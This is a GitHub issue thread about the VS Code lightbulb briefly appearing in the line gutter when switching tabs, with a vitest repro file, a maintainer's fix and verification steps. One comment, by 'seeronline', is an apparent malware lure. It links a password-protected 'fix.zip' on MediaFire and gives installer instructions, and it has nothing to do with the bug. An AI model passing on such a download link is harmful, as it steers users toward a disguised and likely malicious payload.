### ISSUE TITLE
Lightbulb appears in line gutter and disappears resulting in jumping UI

### ISSUE THREAD

**Issue by ulugbekna** [microsoft/vscode#226590]
Not sure how to repro but it happens when I switch tabs. The code actions that appear quickly are "Move to file" and "Move to a new file". 

https://github.com/user-attachments/assets/21f09964-5318-4fe8-b634-d687a67f333f

`foo.test.ts`

```typescript
import { mul } from '../src/foo';
import {expect, describe, it} from 'vitest';

describe('mul f<<CURSOR>>unction', () => { // CURSOR POSITION
	it('should return 6 for mul(2, 3)', () => {
		const result = mul(2, 3);
		expect(result).to.equal(6);
	});

	it('should return 0 for mul(0, 5)', () => {
		const result = mul(0, 5);
		expect(result).to.equal(0);
	});

	it('should return -15 for mul(-3, 5)', () => {
		const result = mul(-3, 5);
		expect(result).to.equal(-15);
	});

	it('should return 25 for mul(5, 5)', () => {
		const result = mul(5, 5);
		expect(result).to.equal(25);
	});

	it('should return 0 for mul(0, 0)', () => {
		const result = mul(0, 0);
		expect(result).to.equal(0);
	});

});

```

Version: 1.93.0-insider
Commit: e81aceaa07bab1ccdc94deae04168c8bd062f0de
Date: 2024-08-26T05:04:02.640Z
Electron: 30.3.1
ElectronBuildId: 9960165
Chromium: 124.0.6367.243
Node.js: 20.15.1
V8: 12.4.254.20-electron.0
OS: Darwin arm64 23.6.0

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by justschen** [comment]
thanks good catch! looks like it's rendering early when switching tabs....not sure why that's happening but will investigate

**Comment by justschen** [comment]
I think this should be fixed by https://github.com/microsoft/vscode/pull/226677, let me know if you can still repro 🌮

**Comment by justschen** [comment]
for some reason this did not repro on certain machines so a more blanket fix was made (to not render the widget prematurely).

to verify above example:
1. install vitest (`npm install`) or run a test in the vscode repo to get any type of badge in the gutter.
2. have some tests to run ie, the examples from ulugblek
3. tab quickly in between and observe if the lightbulb renders in unexpected places or not
